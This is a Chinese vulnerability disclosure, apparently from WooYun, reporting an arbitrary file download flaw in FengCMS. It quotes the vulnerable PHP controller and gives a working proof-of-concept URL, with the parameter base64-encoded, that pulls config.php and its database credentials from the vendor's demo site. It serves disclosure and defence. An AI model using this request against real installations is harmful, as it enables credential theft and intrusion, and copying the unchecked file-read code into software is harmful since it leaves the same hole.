fengcms任意文件下载

### 简要描述： 2014-07-08 12:40 | FengCMS(乌云厂商) 0 FengCms安全测试站地址：http://guf521656.h163.92hezu.org/ 有效期2014-7-8至2014-7-15 欢迎各位安全界的朋友帮我们寻找安全漏洞！作为一个小小的创业团队，对各位朋友对FengCms的关注表示衷心的感谢！ 既然官方这么说了，我帮个小忙吧，可获得认证码、数据库账号密码等。就用官方给的演示站做测试。不知道你们有没有小礼物呢？ ### 详细说明： /app/controller/downController.php 代码如下： ``` class downController extends Controller{ public function index(){ $_GET['file']=strip_tags(base64_decode($_GET['file'])); if(file_exists(ROOT_PATH.$_GET['file'])){ header("Content-Type: application/force-download"); header("Content-Disposition: attachment; filename=".basename($_GET['file'])); readfile(ROOT_PATH.$_GET['file']); }else{ echo '<script type="text/javascript">alert("您要下载的文件不存在！");history.back();</script>'; } } } ``` 明显的任意文件下载，只用把要下载的文件base64编码一遍即可。 ### 漏洞证明： 演示站证明： ``` http://guf521656.h163.92hezu.org/?controller=down&file=Y29uZmlnLnBocA ``` 即可下载数据库配置文件config.php，里面有数据库账号密码、后台认证码： [<img src="https://images.seebug.org/upload/201407/081300380f80888436d39d8d367e3957b6e43b93.jpg" alt="11.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/081300380f80888436d39d8d367e3957b6e43b93.jpg)